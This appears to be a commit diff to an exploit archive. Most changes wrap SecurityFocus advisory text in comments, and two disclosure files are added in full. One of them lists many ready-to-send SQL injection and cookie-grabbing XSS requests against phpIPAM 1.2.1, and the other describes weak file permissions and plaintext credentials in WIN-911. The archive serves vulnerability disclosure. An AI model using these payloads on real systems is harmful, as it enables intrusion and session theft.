View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/2997/info
A potential denial of service vulnerability exists in several TCP stack implementations.
@ -5,6 +6,8 @@ A potential denial of service vulnerability exists in several TCP stack implemen
TCP has a MSS (maximum segment size) option that is used by a TCP client to announce to a peer the maximum amount of TCP data that can be sent per segment. The potential for attacks exists because in many cases only a small minimum value is enforced for the MSS.
By setting the MSS to a low value (such as 1) and making requests for large amounts of data through a TCP service, an attacker could effectively cause a denial of service by causing a large workload on a system.
*/
/*
* (C)Copyright 2001 Darren Reed.

2
platforms/multiple/remote/33877.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/39693/info
NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities.
@ -5,6 +6,7 @@ NovaStor NovaNET is prone to code-execution, denial-of-service, and information-
An attacker can exploit these issues to execute arbitrary code, access sensitive information, or crash the affected application, denying service to legitimate users. Successful attacks may result in the complete compromise of an affected computer.
NovaNET 11 and 12 are vulnerable to all of these issue; NovaBACKUP Network 13 is affected by a denial-of-service vulnerability.
*/
/* novanet-own-lnx.c
*

2
platforms/openbsd/local/21373.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/4495/info
OpenBSD ships with a number of cron jobs configured by default. The tasks are for the purpose of summarizing system information.
@ -5,6 +6,7 @@ OpenBSD ships with a number of cron jobs configured by default. The tasks are fo
The mail(1) utility is used to send the summaries to the root user. This utility supports escaped characters in message text indicating commands to be executed during processing.
If attacker-supplied data can be included in the message text passed to mail(1), commands specified by the attacker may be executed as root. If the attacker embeds the escape sequence followed by an arbitrary command in this data, the commands will be executed as root when the cron task runs. It is possible for an attacker to embed data in filenames, which are included in the emails.
*/
/*
* (c) 2002 venglin@freebsd.lublin.pl

2
platforms/osx/local/25055.c
View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/12314/info
Reportedly a local integer overflow vulnerability affects the Darwin Kernel. This issue is due to a failure of the affected to properly handle integer signedness.
An attacker may leverage this issue to cause the affected computer to crash, denying service to legitimate users. It has been speculated that this issue may also be leverage to escalate privileges, although this is unconfirmed.
*/
//---------------------( fm-nacho.c )--------------------------
/*

3
platforms/osx/local/29201.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/21349/info
Apple Mac OS X is prone to a local memory-corruption vulnerability. This issue occurs when the operating system fails to handle specially crafted arguments to a system call.
@ -5,6 +6,8 @@ Apple Mac OS X is prone to a local memory-corruption vulnerability. This issue o
Attackers may exploit this issue to cause a kernel panic, effectively denying further service to legitimate users. Due to the nature of this issue, successful exploits may potentially result in the execution of arbitrary machine code in the context of the affected kernel, but this has not been confirmed.
Mac OS X version 10.4.8 is vulnerable to this issue; other versions may also be affected.
*/
/*
* Copyright 2006 (c) LMH <lmh@info-pull.com>.

187
platforms/php/webapps/40338.txt Executable file
View file

@ -0,0 +1,187 @@
PHPIPAM 1.2.1 Multiple Vulnerabilities
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: 06 Sep 2016
Tested Version: phpipam-1.2.1 (Latest Version - modified on 2016-02-13)
Vendor: http://phpipam.net/
Product URL: https://sourceforge.net/projects/phpipam/
Date: 20 Mar 2016
About Product:
---------------
phpipam is an open-source web IP address management application (IPAM). Its goal is to provide light, modern and useful IP address management.
It is php-based application with MySQL database backend, using jQuery libraries, ajax and some HTML5/CSS3 features.
Vulnerability Report:
----------------------
SQL Injection Vulnerability (3 Items):
on Tools>Changelog
[sPage] Parameter is vulnerable against SQLi.
Method: GET
Payload:
http://[Site]/phpipam/?page=tools&section=changelog&subnetId=a&sPage=50' [SQLi]
on http://[Site]/phpipam/app/tools/user-menu/user-edit.php
[lang] and [printLimit] Parameters are vulnerable against SQLi.
Payload:
Method : POST
PostData=
real_name=phpIPAM+Admin&email=admin%40domain.local&password1=&password2=&mailNotify=No&mailChangelog=No&printLimit=30&lang=9'[SQLi]
OR
Method : POST
http://[Site]/phpipam/app/tools/user-menu/user-edit.php
PostData=
real_name=phpIPAM+Admin&email=admin%40domain.local&password1=&password2=&lang=9&mailNotify=No&mailChangelog=No&printLimit=30'[SQLi]
===============================================
XSS Vulnerability (36 Items):
Method: POST
http://[Site]/phpipam/app/admin/languages/edit.php
PostData:
langid=2"><script>alert(document.cookie);</script>&action=edit
http://[Site]/phpipam/app/admin/languages/edit.php
PostData:
langid=2&action=edit"><script>alert(document.cookie);</script>
http://[Site]/phpipam/app/admin/widgets/edit.php
PostData:
wid=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/widgets/edit.php
PostData:
wid=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/scan-agents/edit.php
PostData:
id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/groups/edit-group.php
PostData:
id=2"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/groups/edit-group.php
PostData:
id=2&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/users/edit.php
PostData:
id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/tags/edit.php
PostData:
id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/instructions/preview.php
PostData:
instructions=You+can+write+instructions+under+admin+menu!"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/sections/edit.php
PostData:
sectionId=2"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/sections/edit.php
PostData:
sectionId=2&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/subnets/edit.php
PostData:
sectionId=2&subnetId=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/subnets/edit.php
PostData:
sectionId=2&subnetId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/subnets/edit-folder.php
PostData:
sectionId=1&subnetId=5&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&location=IPaddresses
http://[Site]/phpipam/app/admin/devices/edit.php
PostData:
switchId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/device-types/edit.php
PostData:
tid=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/vlans/edit.php
PostData:
vlanId=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit&vlanNum=
http://[Site]/phpipam/app/admin/vlans/edit.php
PostData:
vlanId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&vlanNum=
http://[Site]/phpipam/app/admin/vlans/edit.php
PostData:
vlanId=1&action=edit&vlanNum="><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/vlans/edit-domain.php
PostData:
id="><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=add
http://[Site]/phpipam/app/admin/vlans/edit-domain.php
PostData:
id=&action=add"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/nameservers/edit.php
PostData:
nameserverId=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/nameservers/edit.php
PostData:
nameserverId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/custom-fields/edit.php
PostData:
action=add"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&fieldName=&table=ipaddresses
http://[Site]/phpipam/app/admin/custom-fields/edit.php
PostData:
action=add&fieldName=&table=ipaddresses"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/custom-fields/filter.php
PostData:
table=ipaddresses"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/replace-fields/result.php
PostData:
field=description"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&search=a&csrf_cookie=892d2a900ec7fc1ba9486ec171a36f71&replace=a
http://[Site]/phpipam/app/admin/subnets/edit.php
PostData:
sectionId=1&subnetId=6&action=edit&location=IPaddresses"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/subnets/edit-folder.php
PostData:
sectionId=2&subnetId="><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=add&location=IPaddresses
http://[Site]/phpipam/app/tools/devices/devices-print.php
PostData:
ffield=hostname"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&fval=a&direction=hostname%7Casc
http://[Site]/phpipam/app/tools/devices/devices-print.php
PostData:
ffield=hostname&fval=a"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&direction=hostname%7Casc
http://[Site]/phpipam/app/tools/devices/devices-print.php
PostData:
ffield=hostname&fval=a&direction=hostname%7Casc"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/tools/subnet-masks/popup.php
PostData:
closeClass=hidePopups"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
Method: GET
http://[Site]/phpipam/?page=tools&section=changelog&subnetId=a&sPage=50"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/?page=tools&section=changelog&subnetId=a"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>

2
platforms/unix/local/20381.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/1909/info
ManTrap is a "honeypot" intrusion detection system designed to lure attackers into it for analysis. The honeypot is implemented as a chroot'ed Solaris environment, designed to look and feel real to an attacker who gains access to it.
@ -5,6 +6,7 @@ ManTrap is a "honeypot" intrusion detection system designed to lure attackers in
Chroot (change root) is a unix mechanism that allows an administrator to force a process/process group to run under a subset of the file system, denying access to any other parts of the file system. It is possible for an attacker to guess that they are on a chrooted() ManTrap system by looking at the inode of the root directory (ls -id /). If it is high (usually within the 100000-200000 range), then the root directory is a chrooted() subset of a larger filesystem.
This vulnerability, combined with hidden process disclosure (bugtraq ID 1908) should fairly accurately verify to an attaacker (without root privs) that the host is a ManTrap honeypot, defeating its purpose.
*/
/*

2
platforms/windows/dos/20812.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/2666/info
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
@ -5,6 +6,7 @@ A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
*/
/* land.c by m3lt, FLC
crashes a win95 box */

3
platforms/windows/dos/20814.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/2666/info
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
@ -5,6 +6,8 @@ A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
*/
#define _BSD_SOURCE

8
platforms/windows/dos/20949.c
View file

@ -1,10 +1,10 @@
source: http://www.securityfocus.com/bid/2905/info
// source: http://www.securityfocus.com/bid/2905/info
1C: Arcadia Internet Store is a online shopping utility for Microsoft Windows NT/2000 that is fully integratable with 1C: Enterprise, another popular Russian web-commerce utility.
// 1C: Arcadia Internet Store is a online shopping utility for Microsoft Windows NT/2000 that is fully integratable with 1C: Enterprise, another popular Russian web-commerce utility.
One of the components of this package, 'tradecli.dll', allows users to specify a template file, the contents of which will be output.
// One of the components of this package, 'tradecli.dll', allows users to specify a template file, the contents of which will be output.
Remote attackers can request dos devices, such as 'con', 'com1', 'com2', etc. When 'tradecli.dll' attempts to open these files a denial of service may occur.
// Remote attackers can request dos devices, such as 'con', 'com1', 'com2', etc. When 'tradecli.dll' attempts to open these files a denial of service may occur.
/*
Proof of conecpt code by linux^sex

3
platforms/windows/dos/31585.c
View file

@ -1,8 +1,11 @@
/*
source: http://www.securityfocus.com/bid/28554/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
The vulnerability resides in the Windows kernel. A locally logged-in user can exploit this issue to gain kernel-level access to the operating system.
*/
#include
#include

2
platforms/windows/local/28763.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/20360/info
Symantec AntiVirus is prone to a privilege-escalation vulnerability.
@ -5,6 +6,7 @@ Symantec AntiVirus is prone to a privilege-escalation vulnerability.
Local attackers can exploit this issue to corrupt memory and execute arbitrary code with kernel-level privileges. Successful exploits may facilitate a complete system compromise.
This issue affects only Symantec and Norton antivirus products running on Microsoft Windows NT, Windows 2000, and Windows XP.
*/
////////////////////////////////////
///// Norton Internet Security

8
platforms/windows/local/28764.c
View file

@ -1,10 +1,10 @@
source: http://www.securityfocus.com/bid/20360/info
// source: http://www.securityfocus.com/bid/20360/info
Symantec AntiVirus is prone to a privilege-escalation vulnerability.
// Symantec AntiVirus is prone to a privilege-escalation vulnerability.
Local attackers can exploit this issue to corrupt memory and execute arbitrary code with kernel-level privileges. Successful exploits may facilitate a complete system compromise.
// Local attackers can exploit this issue to corrupt memory and execute arbitrary code with kernel-level privileges. Successful exploits may facilitate a complete system compromise.
This issue affects only Symantec and Norton antivirus products running on Microsoft Windows NT, Windows 2000, and Windows XP.
// This issue affects only Symantec and Norton antivirus products running on Microsoft Windows NT, Windows 2000, and Windows XP.
/////////////////////////////////////////////
///// Norton Internet Security /////

91
platforms/windows/local/40340.txt Executable file
View file

@ -0,0 +1,91 @@
Title: WIN-911 - Insecure File Permissions EoP
CWE Class: CWE-276: Incorrect Default Permissions
Date: 05/09/2016
Vendor: Win911
Product: WIN-911
Type: Alarm Notification Software
Version: V7.17.00
Download URL: through Rockwell Automation downloads:
http://compatibility.rockwellautomation.com/Pages/MultiProductDownload.aspx?crumb=112
Filter on "win-911", "software", "all families"
Tested on: Windows 7x86 EN
Release mode: no bugbounty program, public release
- 1. Product Description: -
The most widely used alarm notification software for the automation industry.
WIN-911 is used by hundreds of Fortune 500 and Global 500 companies.
- 2. Technical Details/PoC: -
This vulnerability allows attackers to escalate their privilege to system administrator
or SYSTEM on vulnerable installations of Win-911.
An attacker must have a valid user-account on the system.
PoC 1:
The product is installed under "C:\Program Files\Specter Instruments\WIN-911 V7".
This directory allows EVERYONE to modify files within this location.
Besides executables running with administrative privileges there are also various services binaries.
These all run as SYSTEM and might be overwritten to obtain SYSTEM level access:
C:\Program Files\Specter Instruments\WIN-911 V7\Mobile-911 Bridge Inbound.exe
C:\Program Files\Specter Instruments\WIN-911 V7\Mobile-911 Bridge Outbound.exe
C:\Program Files\Specter Instruments\WIN-911 V7\viewLinc Bridge.exe
PoC 2:
The web-server is installed as a separate component under:
"C:\Program Files\Specter Instruments\WEB-911 Services"
This directory allows EVERYONE full-control.
Once exploited, this could affect remote users connecting to the web-server.
- 3. Mitigation: -
None.
If you are brave, edit the permissions.
Not sure how this impacts the application.
- 4. Author: -
sh4d0wman
################################################################
Title: WIN-911 - Credential Disclosure
CWE Class: CWE-276: Incorrect Default Permissions | CWE-256: Plaintext Storage of a Password
Date: 05/09/2016
Vendor: Win911
Product: WIN-911
Type: Alarm Notification Software
Version: V7.17.00
Download URL: through Rockwell Automation downloads:
http://compatibility.rockwellautomation.com/Pages/MultiProductDownload.aspx?crumb=112
Filter on "win-911", "software", "all families"
Tested on: Windows 7x86 EN
Release mode: no bugbounty program, public release
- 1. Product Description: -
The most widely used alarm notification software for the automation industry.
WIN-911 is used by hundreds of Fortune 500 and Global 500 companies.
- 2. Technical Details/PoC: -
This vulnerability allows attackers to obtain certain usernames and passwords on
vulnerable installations of Win-911.
An attacker must have a valid user-account on the system.
The product is installed under "C:\Program Files\Specter Instruments\WIN-911 V7".
This directory allows EVERYONE to read and modify files within this location.
During configuration an .ini file is populated with information.
Some of this information is sensitive.
The following settings will log credentials in plain-text:
FIX Remote Alarm
ArchestrA Direct Connect
viewLinc Direct Connect
WIN911 Pager
E-mail POP and SMTP
- 3. Mitigation: -
None yet.
- 4. Author: -
sh4d0wman

4
platforms/windows/remote/21626.c
View file

@ -1,6 +1,6 @@
source: http://www.securityfocus.com/bid/5261/info
// source: http://www.securityfocus.com/bid/5261/info
MERCUR Mailserver is prone to a remotely exploitable buffer overflow condition. The condition is due to insufficient bounds checking in the Control-Service component, which listens on TCP port 32000 by default. It is possible to corrupt process memory by supplying an overly long username/password. Attackers may exploit this condition to execute arbitrary instructions with the privileges of the mailserver.
// MERCUR Mailserver is prone to a remotely exploitable buffer overflow condition. The condition is due to insufficient bounds checking in the Control-Service component, which listens on TCP port 32000 by default. It is possible to corrupt process memory by supplying an overly long username/password. Attackers may exploit this condition to execute arbitrary instructions with the privileges of the mailserver.
/*
mercrexp.c (7/16/2002)

8
platforms/windows/remote/34848.c
View file

@ -1,10 +1,10 @@
source: http://www.securityfocus.com/bid/44163/info
// source: http://www.securityfocus.com/bid/44163/info
1CLICK DVD Converter is prone to multiple vulnerabilities that let attackers execute arbitrary code.
// 1CLICK DVD Converter is prone to multiple vulnerabilities that let attackers execute arbitrary code.
An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
// An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
LG Software Innovation 1CLICK DVD Converter 2.1.7.1 is vulnerable; other versions may also be affected.
// LG Software Innovation 1CLICK DVD Converter 2.1.7.1 is vulnerable; other versions may also be affected.
/*
#One CLICK DVD Converter 2.1.7.1 DLL Hijacking Exploit (vsoscaler.dll ; swscale.dll ; dvd43.dll )